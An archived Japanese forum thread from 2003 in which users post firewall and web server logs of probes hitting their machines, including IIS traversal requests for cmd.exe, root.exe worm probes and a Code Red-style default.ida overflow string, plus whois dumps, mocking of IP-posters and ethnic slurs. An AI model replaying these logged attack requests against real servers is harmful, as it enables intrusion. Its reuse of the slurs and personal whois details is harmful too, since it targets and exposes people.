2003-01-13 08:42:59 80.130.182.226 HEAD /scripts/..%5c..%5cwinnt/system32/cmd.exe 500 2003-01-13 08:43:02 80.130.182.226 HEAD /scripts/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe 500 2003-01-13 08:43:05 80.130.182.226 HEAD /scripts/..チ..チ..チ..チwinnt/system32/cmd.exe 500 2003-01-13 08:43:08 80.130.182.226 HEAD /winnt/system32/cmd.exe 404 2003-01-13 08:43:11 80.130.182.226 HEAD /winnt/system32/cmd.exe 404 2003-01-13 08:43:14 80.130.182.226 HEAD /winnt/system32/cmd.exe 404 2003-01-13 08:43:17 80.130.182.226 HEAD /scripts/winnt/system32/cmd.exe 404 2003-01-13 08:43:20 80.130.182.226 HEAD /scripts/.%2e/.%2e/winnt/system32/cmd.exe 500 2003-01-13 08:43:23 80.130.182.226 HEAD /scripts/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500 2003-01-13 08:43:26 80.130.182.226 HEAD /scripts/..%5c..%5cwinnt/system32/cmd.exe 500
342 :
名無しさん@そうだ選挙にいこう :03/01/14 07:09
>>337-341 の続き
(省略256件)
2003-01-13 08:58:23 80.130.182.226 HEAD /..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe 404
長いから省略ね。
いろんなパターン試してるよ。
こっちは、ちゃんとパッチあててるっつーの。
343 :
名無しさん@そうだ選挙にいこう :03/01/14 07:14
全部で306件。途中で気づいたからルータの設定切ったけど。 (ほっといてもよかったんだけど、やっぱうざいから) このまま放置してたらどこまで続いたんだろう?
344 :
名無しさん@お腹いっぱい。 :03/01/14 22:58
162.73.4.22 ・・・・かなりウジャイ・・・ 最近こいつばっか。
(^^)
346 :
名無しさん@お腹いっぱい。 :03/01/16 12:47
130.54.248.158 く せ え
このスレは、アタッカーとワームの区別もつかんやつが集まってるようだね。 さすが2ch、厨房の集まりだな。
ここは隔離スレッドです
2003/01/16 07:02:00 210.80.197.158:80 aaa.bbb.ccc.ddd:3006 ポート 3006 (TCP) 2003/01/16 07:02:00 210.80.197.158:80 aaa.bbb.ccc.ddd:3006 ポート 3006 (TCP) 2003/01/16 21:02:57 210.80.197.158:80 aaa.bbb.ccc.ddd:3006 ポート 3006 (TCP) 2003/01/16 21:03:45 210.80.197.158:80 aaa.bbb.ccc.ddd:3055 ポート 3055 (TCP) 2003/01/16 21:04:45 210.80.197.158:80 aaa.bbb.ccc.ddd:3062 ポート 3062 (TCP) 2003/01/16 21:23:50 210.80.197.158:80 aaa.bbb.ccc.ddd:3265 ポート 3265 (TCP) 2003/01/16 23:03:35 210.80.197.158:80 aaa.bbb.ccc.ddd:3467 ポート 3467 (TCP) 2003/01/16 23:05:50 210.80.197.158:80 aaa.bbb.ccc.ddd:3516 ポート 3516 (TCP) 2003/01/16 23:06:44 210.80.197.158:80 aaa.bbb.ccc.ddd:3574 ポート 3574 (TCP) 2003/01/16 23:09:07 210.80.197.158:80 aaa.bbb.ccc.ddd:3609 ポート 3609 (TCP) 2003/01/16 23:27:54 210.80.197.158:80 aaa.bbb.ccc.ddd:3658 ポート 3658 (TCP) 2003/01/17 20:40:09 210.80.197.158:80 aaa.bbb.ccc.ddd:1049 ポート 1049 (TCP) 2003/01/17 20:41:06 210.80.197.158:80 aaa.bbb.ccc.ddd:1067 ポート 1067 (TCP) 2003/01/17 23:42:34 210.80.197.158:80 aaa.bbb.ccc.ddd:3109 ポート 3109 (TCP) 2003/01/18 00:58:45 210.80.197.158:80 aaa.bbb.ccc.ddd:3107 ポート 3107 (TCP) 2003/01/18 01:22:31 210.80.197.158:80 aaa.bbb.ccc.ddd:3307 ポート 3307 (TCP) 2003/01/18 17:48:50 210.80.197.158:80 aaa.bbb.ccc.ddd:4237 ポート 4237 (TCP) 2003/01/18 21:28:03 210.80.197.158:80 aaa.bbb.ccc.ddd:3006 ポート 3006 (TCP) 2003/01/18 22:11:59 210.80.197.158:80 aaa.bbb.ccc.ddd:3138 ポート 3138 (TCP) 漏れのIPはaaa.bbb.ccc.dddに置き換えてある。 210.80.197.158は何者だろう?
>>349 そこに疑問を持つ前にSourcePortが80であることに疑問を持てよ。
踏み台のIP晒してどうするの?
354 :
名無しさん@お腹いっぱい。 :03/01/23 01:15
211.123.229.140 こいつkansaiやねん。
355 :
名無しさん@お腹いっぱい。 :03/01/23 19:47
61.180.94.131
あぼーん
211.135.255.206
Fri Jan 24 07:29:49/2003 SOCKS: Can't connect to server 207.46.104.20, port 1863
アタックNo1
210.196.191.85から23にスキャン。
361 :
( ・ω・)y─~~~~ :03/01/25 19:03
*.jsのアタッカー? 03/01/25 19:00:05 通信の要求 210.158.219.38 TCP(1887)
362 :
名無しさん@お腹いっぱい。 :03/01/25 21:37
内容としては、侵入方法、防御方法、侵入された場合の対処方法
についてお話したいと考えてます。
---------------------------------------------------
有限会社マギシステム
片山 昌樹 / Masaki Katayama
Phone:03-5956-2926 / Net FAX : 020-4622-4260
E-Mail:
[email protected] http://www.magi.co.jp/ ---------------------------------------------------
IP Address List HostName Aliases 63.187.169. 0 sdn-ap-017castocP2542.dialsprint.net
アタッカーて訳でもないが、他人のアドレスで勝手にメルマガ登録する 困ったさんです。スレ違い?スマソ・・・。 ●登録日時: 2003/01/28 09:05:45 ●登録時IPアドレス: 210.131.173.187 ●登録日時: 2003/01/28 09:05:52 ●登録時IPアドレス: 210.131.173.187 ●登録日時: 2003/01/28 09:06:24 ●登録時IPアドレス: 210.131.173.187 ....登録IPが一緒なんだけど(笑)。 WhoISの結果とかって、晒していいもんなんでしょうか?
>>364 板違い。ネットワークセキュリティに関係ない。
366 :
名無しさん@お腹いっぱい。 :03/01/28 15:44
21日から133.100.9.2からPORT 123にしきりに来るんですが他に来てる人居ません? 当方フレッツISDNで3分で切れるようにしてるんでしょっちゅうIP変わるんですが しつこく来るんですよね。 それともLAN内のPCがウイルスにやられてるのかなぁ。
へへへ いただき!!! 1000ゲト
218.222.180.235 ポート6699に来た MXつけっぱで外出してかえってくるとたまにアタックされてるが
370 :
名無しさん@お腹いっぱい。 :03/01/29 02:07
>>369 >ポート6699に来た
だからそれ、MXじゃないの?
372 :
名無しさん@お腹いっぱい。 :03/01/29 08:54
03/01/28 14:12:54 ICMP Traffic n/a 24-193-45-49.nyc.rr.com Echo Reply/0 送信 LocalHost ICMP Echo Reply/0 00:00:00 03/01/28 14:12:54 ICMP Traffic n/a 24-193-45-49.nyc.rr.com Echo Request/0 受信 LocalHost ICMP Echo Request/0 00:00:00
>>371 364が発行してるメルマガに他人のアドレスで勝手に登録してくる奴のIPだろ。
374 :
名無しさん@お腹いっぱい。 :03/01/29 23:03
こんなパケットがきました。で、このサイトIP逆引きできないし、 匿名FTP外部に公開してるし(カレントディレクトリ設定してないから 入れないようだけど)なんか、踏台っぽいな。 ちなみにWho isすると...まぁ興味のあるひとがやってみればいいか。 210.150.186.180:13611 -> aaa.bbb.ccc.ddd:57875 INVALIDACK *2*A*RS* RESERVEDBITS 210.150.186.180:0 -> aaa.bbb.ccc.ddd:0 NULL ******** 210.150.186.180:57992 -> aaa.bbb.ccc.ddd:53824 VECNA 12**P*** RESERVEDBITS 210.150.186.180:53830 -> aaa.bbb.ccc.ddd:26148 UNKNOWN 1****R** RESERVEDBITS
>>374 パケット壊れてるぽ。つーか、お前と同じFW使って無くてもわかるように16進ダンプにしろよ。
>>374 InfoSphere (株式会社NTTPCコミュニケーションズ) の配下にあって………
ぶわははははは 激しくワロタ (w
興味がある人はWebサイト見てみるべし!(藁
ちなみにwhoisで出てきたコレって、以前「彼氏募集中」なSPAM送ってきたヤシが 名乗ってた名前だったような気が…… # そろそろスレ違い気味なんでsage
>>375 パケットのヘッダを詐称(Spoofing)しているんだとおもわれ。
Snortでログとっていただけだから16進ダンプはなくてね...スマソ
219.107.149.185 こいつトロイばっか送りつけてきやがる うざすぎ
380 :
名無しさん@お腹いっぱい。 :03/01/30 00:17
2003/01/29 19:59:18Rst attack68.164.118.85 -> 68.164.118.85 2003/01/29 20:59:20Rst attack68.164.118.85 -> 68.164.118.85 2003/01/29 23:59:27Rst attack68.164.118.85 -> 68.164.118.85
「トロイの木馬のデフォルト遮断 によって検出しました」というメッセージをトロイ送ってきていると勘違いしている 馬鹿はとっとと死んでくれ。
29/01/2003 22:06:12.467584 pppoe0 @100:13 b 195.117.126.24,26464 -> xxx.xxx.xxx.xxx,6588 PR tcp len 20 64 -S IN 29/01/2003 22:06:13.463107 pppoe0 @100:13 b 195.117.126.24,30953 -> xxx.xxx.xxx.xxx,6588 PR tcp len 20 64 -S IN 29/01/2003 22:06:14.318802 pppoe0 @100:13 b 195.117.126.24,15872 -> xxx.xxx.xxx.xxx,6588 PR tcp len 20 64 -S IN 29/01/2003 22:06:15.272010 pppoe0 @100:13 b 195.117.126.24,43083 -> xxx.xxx.xxx.xxx,6588 PR tcp len 20 64 -S IN 29/01/2003 22:06:16.206179 pppoe0 @100:13 b 195.117.126.24,38675 -> xxx.xxx.xxx.xxx,6588 PR tcp len 20 64 -S IN 29/01/2003 22:06:17.139994 pppoe0 @100:13 b 195.117.126.24,22840 -> xxx.xxx.xxx.xxx,6588 PR tcp len 20 64 -S IN
このスレは、whoisの結果を貼りつけると
どこにいるかもしれない相手がビビると思ってたり
自分の「ふぁいあーうぉーる」でブロックされたIPアドレスを公開すると
世の中が良くなると信じている人たちの隔離場所です。
>>382 質問は適当な質問スレへどうぞ。
384 :
名無しさん@お腹いっぱい。 :03/01/30 01:05
いいえ、単なる自己満足スレッドです。
385 :
名無しさん@お腹いっぱい。 :03/02/11 12:20
U170194.ppp.dion.ne.jp 死国の猿 p1125-ip01oomichi.oita.ocn.ne.jp 大分在住の元死国の猿
80.136.106.76 Fuck
387 :
名無しさん@お腹いっぱい。 :03/02/15 08:01
IP 219.165.249.80 ホスト n249080.ap.plala.or.jp 固定IPっぽいですw アフォですなw
固定じゃなかったw(爆)
202.229.198.199 210.81.226.212 211.239.163.19 202.168.201.129 逝ってよし。
218.5.3.150 うぜえ
(^^)
∧_∧ ( ^^ )< ぬるぽ(^^)
Cykhm17DS20.kng.mesh.ad.jp
210.136.232.249 210.138.60.216
f-ibaraki-193232.zero.ad.jp
━―━―━―━―━―━―━―━―━[JR山崎駅(^^)]━―━―━―━―━―━―━―━―━―
∧_∧ ピュ.ー ( ^^ ) <これからも僕を応援して下さいね(^^)。 =〔~∪ ̄ ̄〕 = ◎――◎ 山崎渉
398 :
名無しさん@お腹いっぱい。 :03/06/09 00:55
81.2.168.51 デンマークの電波な香具師のIP マジ困ってる、こいつヤバイ、超ヤバイ どれ位ヤバイかっていうと、ヤらせろってメールきたんよ 俺は男だってかえしたら 俺も男だってきたんよ や ら な い か ? なのか? とりあえずPING爆弾でも送っとくか…
399 :
無料動画直リン :03/06/09 01:10
>>398 やらしてやるからすぐに来いといってやれ。
211.194.69.250 koreaから来た。クソッタレ
403 :
名無しさん@お腹いっぱい。 :03/06/12 21:04
68.69.35.32 最近毎日だよ・・・・
404 :
名無しさん@お腹いっぱい。 :03/06/12 21:33
68.55.251.155 なんか不審なきがする。だれか調査してくれ。
218.145.25.49 - - [21/Apr/2003:14:21:43 +0900] "GET /robots.txt HTTP/1.0" 200 391 "-" "dloader(NaverRobot)/1.0" 218.145.25.49 - - [21/Apr/2003:14:21:49 +0900] "GET / HTTP/1.0" 200 13502 "-" "dloader(NaverRobot)/1.0" 218.145.25.49 - - [21/Apr/2003:14:21:49 +0900] "GET /2002/bnlcortisiciliani/corti.asp HTTP/1.0" 404 921 "-" "dloader(NaverRobot)/1.0" 218.145.25.49 - - [21/Apr/2003:14:21:49 +0900] "GET /2002/cinemadalmondo/default.asp HTTP/1.0" 404 921 "-" "dloader(NaverRobot)/1.0" 218.145.25.49 - - [21/Apr/2003:14:21:49 +0900] "GET /2002/convegno/default.asp HTTP/1.0" 404 921 "-" "dloader(NaverRobot)/1.0" 218.145.25.49 - - [21/Apr/2003:14:21:50 +0900] "GET /2002/diamondaward/default.asp HTTP/1.0" 404 921 "-" "dloader(NaverRobot)/1.0" 218.145.25.49 - - [21/Apr/2003:14:21:50 +0900] "GET /2002/english/default.asp HTTP/1.0" 404 921 "-" "dloader(NaverRobot)/1.0" 218.145.25.49 - - [21/Apr/2003:14:21:50 +0900] "GET /2002/grandecinema/default.asp HTTP/1.0" 404 921 "-" "dloader(NaverRobot)/1.0" 218.145.25.49 - - [21/Apr/2003:14:21:50 +0900] "GET /2002/leone/default.asp HTTP/1.0" 404 921 "-" "dloader(NaverRobot)/1.0" 218.145.25.49 - - [21/Apr/2003:14:21:50 +0900] "GET /2002/marilynforever/default.asp HTTP/1.0" 404 921 "-" "dloader(NaverRobot)/1.0"
218.145.25.49 - - [21/Apr/2003:14:21:51 +0900] "GET /2002/morrissey/default.asp HTTP/1.0" 404 921 "-" "dloader(NaverRobot)/1.0" 218.145.25.49 - - [21/Apr/2003:14:21:51 +0900] "GET /2002/mostre/mostre.asp HTTP/1.0" 404 921 "-" "dloader(NaverRobot)/1.0" 218.145.25.49 - - [21/Apr/2003:14:21:51 +0900] "GET /2002/nastridargento/default.asp HTTP/1.0" 404 921 "-" "dloader(NaverRobot)/1.0" 218.145.25.49 - - [21/Apr/2003:14:21:51 +0900] "GET /2002/programma/programma.asp HTTP/1.0" 404 921 "-" "dloader(NaverRobot)/1.0" 218.145.25.49 - - [21/Apr/2003:14:21:51 +0900] "GET /2002/pubblicazioni/pubblicazioni.asp HTTP/1.0" 404 921 "-" "dloader(NaverRobot)/1.0" 218.145.25.49 - - [21/Apr/2003:14:21:52 +0900] "GET /2002/rassegna_stampa/default.asp HTTP/1.0" 404 921 "-" "dloader(NaverRobot)/1.0" 218.145.25.49 - - [21/Apr/2003:14:21:52 +0900] "GET /2002/servizi/default.asp HTTP/1.0" 404 921 "-" "dloader(NaverRobot)/1.0" 218.145.25.49 - - [21/Apr/2003:14:21:52 +0900] "GET /2002/showcase.asp HTTP/1.0" 404 921 "-" "dloader(NaverRobot)/1.0" 218.145.25.49 - - [21/Apr/2003:14:21:52 +0900] "GET /2002/sponsor/sponsor.asp HTTP/1.0" 404 921 "-" "dloader(NaverRobot)/1.0" 218.145.25.49 - - [21/Apr/2003:14:21:52 +0900] "GET /2002/ticketone.asp HTTP/1.0" 404 921 "-" "dloader(NaverRobot)/1.0"
等、58行に渡る。
他人のHPに管理人のフリをして悪質レスをしまくる。 6月13日(金)02時50分11秒 Remote Host: 61-205-102-8.eonet.ne.jp 大阪の基地害女には何を送るべき?
24.186.119.129 トロイ送りつけてきやがった。アメリカ人は氏ねよ。
410 :
名無しさん@お腹いっぱい。 :03/06/17 09:10
hmmt127163.catv.ppp.infoweb.ne.jp
板TOPより転載 この板は、LANや個人のPCへの侵入、トロイ、ウィルス等、 様々なネット上の危険からの防御法や対策を語りあうための板です。 掲示板の荒らし方や侵入の方法、メールボムの送り方等、 攻撃方法の質問はご遠慮下さい。 2ちゃんねるでは荒らし依頼は出来ません。 また、この板ではアタック依頼は受け付けません。 攻撃依頼を見かけた方は、放置してください。 ネット犯罪の被害者になってしまった方は、まず警察にご相談下さい。
413 :
名無しさん@お腹いっぱい。 :03/06/17 09:31
このスレの人は、 踏み台やバウンダーやパラサイトの類の可能性を信じない人たちですか?
厨房隔離スレですから…
415 :
名無しさん@お腹いっぱい。 :03/06/18 08:08
61.26.183.111 最近サイトに荒らしが来るのだが、このIPをサーチすると 国がAUになる。 オーストラリア等の串で荒らしてるということですか??
うん、そうだよ。
68.42.30.212 - - [18/Jun/2003:17:14:35 +0900] "POST
http://210.***.***.***:25/ HTTP/1.1" 403 307
210.240.71.131 - - [18/Jun/2003:17:15:35 +0900] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 278
うぜぇ
p6237-ip02souka.saitama.ocn.ne.jp
419 :
名無しさん@お腹いっぱい。 :03/06/18 23:01
FLA2Abj190.osk.mesh.ad.jp 虎戦士
64.71.177.66 biwa38.he.net OrgName Hurricane Electric OrgID HURC Address 3433 Rockett Drive City Fremont StateProv CA Postalcode 94538 Country US カリフォルニア Sunnyvale だってさ。 11回もありがとうございました。
すみません まねして自分の所に来たやつを載せてみたんだけど 意味あるのかな? お役にたてますか?これでなんか分かるんですか?初心者なんで怒らないでください。
422 :
名無しさん@お腹いっぱい。 :03/06/19 07:16
なにを11回なんだ?それによるだろ?
423 :
名無しさん@お腹いっぱい。 :03/06/19 07:57
>417さんの はじめ 〇にみえたがそれって ×だよねえー >422さん 初心者なんでよくわかんないんだよ。 ルーター通り越してFWまできたんだよ。 危険度 高 だって。。
425 :
((≡ ̄♀ ̄≡)) :03/06/19 08:05
>>電話屋さん
やはり、良く分からん。。。
ルータを通ってFWにアクセスが11回あったってこと?
ルータのルーティング設定によってちゃあ、普通に通すこともあり得る。
でもFWでちゃんとハジいてんでしょ?だったら大丈夫だろ。
心配だったらルータの設定見なおしてみれば。
鯖立てて、ポートフォワードしてたりしない?
>>423 ある意味アタックだが、ありふれすぎてて話題にもしたくない内容だ。
しかも古い・・・
久しぶりにマジレス(藁
64.71.177.66 HTTP_IIS_ISAPI_Extension攻撃(藁
430 :
名無しさん@お腹いっぱい。 :03/06/19 12:11
156.34.179.38 - - [19/Jun/2003:00:57:58 +0900] "OPTIONS / HTTP/1.1" 403 290 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600" 画面がすくろーるしちまったよ。30回ぐらいアクセスしてきた。
431 :
名無しさん@お腹いっぱい。 :03/06/19 18:17
もっとスゴイアッタク教えて下さい。
345 名前: エロ本屋 投稿日: 03/06/19 18:25 HOST:EAOcf-321p227.ppp15.odn.ne.jp 345 名前: エロ本屋 投稿日: 03/06/19 18:25 HOST:EAOcf-321p227.ppp15.odn.ne.jp 345 名前: エロ本屋 投稿日: 03/06/19 18:25 HOST:EAOcf-321p227.ppp15.odn.ne.jp 345 名前: エロ本屋 投稿日: 03/06/19 18:25 HOST:EAOcf-321p227.ppp15.odn.ne.jp 345 名前: エロ本屋 投稿日: 03/06/19 18:25 HOST:EAOcf-321p227.ppp15.odn.ne.jp 345 名前: エロ本屋 投稿日: 03/06/19 18:25 HOST:EAOcf-321p227.ppp15.odn.ne.jp 345 名前: エロ本屋 投稿日: 03/06/19 18:25 HOST:EAOcf-321p227.ppp15.odn.ne.jp 345 名前: エロ本屋 投稿日: 03/06/19 18:25 HOST:EAOcf-321p227.ppp15.odn.ne.jp 345 名前: エロ本屋 投稿日: 03/06/19 18:25 HOST:EAOcf-321p227.ppp15.odn.ne.jp 345 名前: エロ本屋 投稿日: 03/06/19 18:25 HOST:EAOcf-321p227.ppp15.odn.ne.jp 345 名前: エロ本屋 投稿日: 03/06/19 18:25 HOST:EAOcf-321p227.ppp15.odn.ne.jp 345 名前: エロ本屋 投稿日: 03/06/19 18:25 HOST:EAOcf-321p227.ppp15.odn.ne.jp 345 名前: エロ本屋 投稿日: 03/06/19 18:25 HOST:EAOcf-321p227.ppp15.odn.ne.jp 消えろODN基地外ユーザー
おまいら踏み台のIP晒して楽しいか?
24.95.232.113
435 :
名無しさん@お腹いっぱい。 :03/06/20 06:39
IP晒すんなら踏み台遡って攻撃元まで晒せ。
>435
どーやんの?
>>429 同じIPだねえ。。。
アフォは消えろ 糞スレあげんな
よくわからないねえ。。。 何を主張したいの?
>何を主張したいの? 糞スレあげんな
sage進行でおながいします(E-mail欄に半角でsageと入れる)。 IP晒すなら、踏み台遡って攻撃元まで晒すようおながいします。 踏み台か攻撃元か判別できない方、どうやれば遡れるのか分からない方は 書き込まないことを推奨します。
210.153.146.238
438 は 私のふりして 書き込んだな。。。 >441 今回は sage で書き込みしました。
444 :
名無しさん@お腹いっぱい。 :03/06/23 16:35
FM-4735B71DD3F7 172.17.17.4 202.148.142.14
埋め立て
64.216.218.54
218.123.72.69 まったく
おまいら踏み台のIP晒して楽しいか?
sage進行でおながいします(E-mail欄に半角でsageと入れる)。 IP晒すなら、踏み台遡って攻撃元まで晒すようおながいします。 踏み台か攻撃元か判別できない方、どうやれば遡れるのか分からない方は 書き込まないことを推奨します。
219.104.204.80 oyma.102080.catv.ppp.infoweb.ne.jp 真性ですな
453 :
名無しさん@お腹いっぱい。 :03/07/02 00:04
IPからどうやって地域を特定するのでしょうか? 最近、しかも早朝に攻撃されてむかついています
455 :
名無しさん@お腹いっぱい。 :03/07/02 01:23
ここに晒すこと自体意味あるのかね? 代わりに仕返ししてくれるとかじゃないだろ
某掲示板のスレでありもしないコトでたたかれました。 おかげで信用はなくすし・・・、掲示板のカキコからIPをぬくコトはできなぃのでしょうか? どぅしても、カキコした人を捕まえたいんです。 情報ください。お願いします。
あぼーん
ぇっと・・・、繭は風俗情報を知りたぃわけじゃなぃんですが。
461 :
名無しさん@お腹いっぱい。 :03/07/02 18:59
ノートンで・・・・ KOKUSAI KOUGYOU KANDA BLDG 6F
?
hompy.comってなんだ? 個人情報を取ってる感じ。 マカフィーが反応しています。 みなさんも、気をつけて!
あぼーん
468 :
(;´Д`) :03/07/03 21:25
469 :
名無しさん@お腹いっぱい。 :03/07/03 21:25
2003/07/03 22:10:24, HTTP port probe, 220.73.165.11, 53 こいつウザイ今アタックしまくってる、もう70回超えてる、たのむからちゃんとしろよボケ
471 :
名無しさん@お腹いっぱい。 :03/07/03 22:40
昨日に引き続き お隣、韓国ソウルからのアタック inetnum: 218.237.232.0 - 218.237.232.255 netname: HANANET-CATV-ANYANGSO-KR descr: HANARO Telecom descr: 1445-3 Seocho-Dong Seocho-Ku descr: SEOUL descr: 137-728 country: KR
473 :
名無しさん@お腹いっぱい。 :03/07/04 00:20
>>472 あなたは見知らぬ闇討ちされた事されたありますか?
驚きませんか探知されてるのですよ
それを進とはなんですね
475 :
名無しさん@お腹いっぱい。 :03/07/04 01:03
はぁ? 人間的心をもっていない2chに頼りきりの弱小脆弱日本人がないいってんですか
476 :
名無しさん@お腹いっぱい。 :03/07/04 01:04
おこっちゃまし! し!
477 :
名無しさん@お腹いっぱい。 :03/07/04 01:04
ふー!
478 :
名無しさん@お腹いっぱい。 :03/07/04 01:04
2chはCoReAに統合されます 感謝してください
479 :
名無しさん@お腹いっぱい。 :03/07/04 01:05
あ¥s
480 :
名無しさん@お腹いっぱい。 :03/07/04 01:05
?夬????, ?
481 :
名無しさん@お腹いっぱい。 :03/07/04 01:14
>>475 日本人がないいってんですか
「ないいってんですか 」はチョソ同士では通じるかも知れませんが、
日本語を練習してから書き込んで下さい。
482 :
名無しさん@お腹いっぱい :03/07/04 01:18
483 :
名無しさん@お腹いっぱい。 :03/07/04 01:19
>481 それはあなただーo(-_^)v(ぷっ
484 :
名無しさん@お腹いっぱい。 :03/07/04 06:48
>>482 凄いアホをみてしまった。素で焦った。
こんなあほな中学生がいたとは・・・・
あぼーん
220.104.110.164 p8164-ipad29hodogaya.kanagawa.ocn.ne.jp
488 :
名無しさん@お腹いっぱい。 :03/07/06 02:22
( ´_ゝ`)フーン 日本の植民地だった国の人が、しゃしゃり出て来るスレはココですか。 そんなに、日本人とお話したかったら、おとなしく併合されとけば良かったのにね〜。
490 :
名無しさん@お腹いっぱい :03/07/06 13:48
IIS4 で自鯖してるんだけど、NETSTATで見ていたら TCP 192.168.1.8:1794 207.46.82.78:80 TIME_WAIT TCP 192.168.1.8:1795 207.46.82.78:80 TIME_WAIT TCP 192.168.1.8:1842 207.46.82.78:80 TIME_WAIT TCP 192.168.1.8:1843 207.46.82.78:80 TIME_WAIT TCP 192.168.1.8:1845 207.46.82.78:80 TIME_WAIT TCP 192.168.1.8:1846 207.46.82.78:80 TIME_WAIT TCP 192.168.1.8:1847 207.46.82.78:80 TIME_WAIT TCP 192.168.1.8:1849 207.46.82.78:80 TIME_WAIT TCP 192.168.1.8:1850 207.46.82.78:80 TIME_WAIT TCP 192.168.1.8:1855 207.46.82.78:80 TIME_WAIT TCP 192.168.1.8:1856 207.46.82.78:80 TIME_WAIT TCP 192.168.1.8:1859 207.46.82.78:80 TIME_WAIT TCP 192.168.1.8:1861 207.46.82.78:80 TIME_WAIT TCP 192.168.1.8:1864 207.46.82.78:80 TIME_WAIT TCP 192.168.1.8:1865 207.46.82.78:80 TIME_WAIT TCP 192.168.1.8:1866 207.46.82.78:80 TIME_WAIT TCP 192.168.1.8:1870 207.46.82.78:80 TIME_WAIT TCP 192.168.1.8:1873 207.46.82.78:80 TIME_WAIT TCP 192.168.1.8:1876 207.46.82.78:80 TIME_WAIT こんなのが見えるんだけれど ?
>>491 調子乗ってると、おまえの住所調べ上げんぞ。
それなりのソフトもあるしな。うひょげら
クスクス
本物のトリップを出してからどうぞ。
219.106.13.77 新潟三洋電子 踏み台なのか?そうなのか?どうなんだYO!
497 :
名無しさん@お腹いっぱい。 :03/07/07 23:48
ここいつも攻撃して来るんだけど。
Yahooの職員がハッキングしてるって噂がある。
inetname: 2190.0.0.-219.63.255.255
netname:BBTECH
descr:SOFTBANK BB CORP
descr:Nation wide network in Japan
country:JP
admin-c:SA127-AP
tech-c:SA12-AP
mnt-by:APNIC-HM
mnt-lower:MAINT-JP-BBTECH
changed:
[email protected] 20011031
changed:
[email protected] 20030616
status: ALLCATED PORTABLE
source:APNIC
sage進行でおながいします(E-mail欄に半角でsageと入れる)。 IP晒すなら、踏み台遡って攻撃元まで晒すようおながいします。 踏み台か攻撃元か判別できない方、どうやれば遡れるのか分からない方は 書き込まないことを推奨します。
inetnum: 219.138.0.0 - 219.140.255.255
netname: CHINANET-HB
descr: CHINANET hubei province network
descr: China Telecom
descr: A12,Xin-Jie-Kou-Wai Street
descr: Beijing 100088
country: CN
admin-c: CH93-AP
tech-c: CHA1-AP
mnt-by: MAINT-CHINANET
mnt-lower: MAINT-CN-CHINANET-HB
changed:
[email protected] 20020521
status: ALLOCATED NON-PORTABLE
source: APNIC
中国人はっかー??
sage進行でおながいします(E-mail欄に半角でsageと入れる)。 IP晒すなら、踏み台遡って攻撃元まで晒すようおながいします。 踏み台か攻撃元か判別できない方、どうやれば遡れるのか分からない方は 書き込まないことを推奨します。
502 :
名無しさん@お腹いっぱい。 :03/07/08 02:02
% [whois.apnic.net node-1]
% How to use this server
http://www.apnic.net/db/ % Whois data copyright terms
http://www.apnic.net/db/dbcopyright.html inetnum: 210.13.0.0 - 210.13.31.255
netname: JITONG-CN
descr: Ji Tong Communications Co.,Ltd, Beijing Branch
country: CN
admin-c: QZ30-AP
tech-c: QZ30-AP
mnt-by: MAINT-CHINAGBN-AP
changed:
[email protected] 20010626
status: ALLOCATED PORTABLE
source: APNIC
person: Qing Zhourong
address: Room 201,Buiding 4,No.27 Wanshou Road, Beijing
address: BEIJING, CHINA
country: CN
phone: +86-010-64262954
fax-no: +86-010-64251441
e-mail:
[email protected] nic-hdl: QZ30-AP
mnt-by: MAINT-CHINAGBN-AP
changed:
[email protected] 20010626
source: APNIC
503 :
名無しさん@お腹いっぱい。 :03/07/08 15:15
>501 >IP晒すなら、踏み台遡って攻撃元まで晒すようおながいします。 >踏み台か攻撃元か判別できない方、どうやれば遡れるのか分からない方 うざい、何回も同じ事繰り返し書くな 前向きに話を進めたいなら、判別の仕方教えれ じゃなきゃ、おまえ自身が荒らしと変わらんぞ
504 :
名無しさん@お腹いっぱい。 :03/07/08 15:48
>>503 >IP晒すなら、踏み台遡って攻撃元まで晒すようおながいします
508 :
アメリカ在住 :03/07/09 03:21
アメリカの色んな出合い系に出没する有名なアメリカ人がいるらしいんだけど どうも英語が下手で、アメリカ人では気がするんだよ。 試しにメール書いてみたら、IPがアメリカなんだが 別なサイトでそいつに遭遇した時は、イタリアになってたりドイツになってたり するんだよ。どういうことだ?
訂正 アメリカ人では無い気がするんだよ
511 :
名無しさん@お腹いっぱい。 :03/07/09 03:40
2003/07/08(22:17:26) W-SV 218.75.150.179 [80] 404 242 "GET /scripts/root.exe?/c+dir HTTP/1.0" 2003/07/08(22:17:27) W-SV 218.75.150.179 [80] 404 240 "GET /msadc/root.exe?/c+dir HTTP/1.0" 2003/07/08(22:17:28) W-SV 218.75.150.179 [80] 404 250 "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 2003/07/08(22:27:35) W-SV 218.43.3.181 [80] 404 242 "GET /scripts/root.exe?/c+dir HTTP/1.0" 2003/07/08(22:27:35) W-SV 218.43.3.181 [80] 404 240 "GET /msadc/root.exe?/c+dir HTTP/1.0" 2003/07/08(22:27:35) W-SV 218.43.3.181 [80] 404 250 "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 2003/07/08(22:27:36) W-SV 218.43.3.181 [80] 404 250 "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 2003/07/08(22:27:36) W-SV 218.43.3.181 [80] E200035 ".. が含まれるリクエストは許可されていません。 [ 218.43.3.181 "/scripts/..\../winnt/system32/cmd.exe" ]" 2003/07/08(22:27:36) W-SV 218.43.3.181 [80] 403 262 "GET /scripts/..\../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 2003/07/08(22:27:36) W-SV 218.43.3.181 [80] E200035 ".. が含まれるリクエストは許可されていません。 [ 218.43.3.181 "/_vti_bin/..\../..\../..\../winnt/system32/cmd.exe" ]" 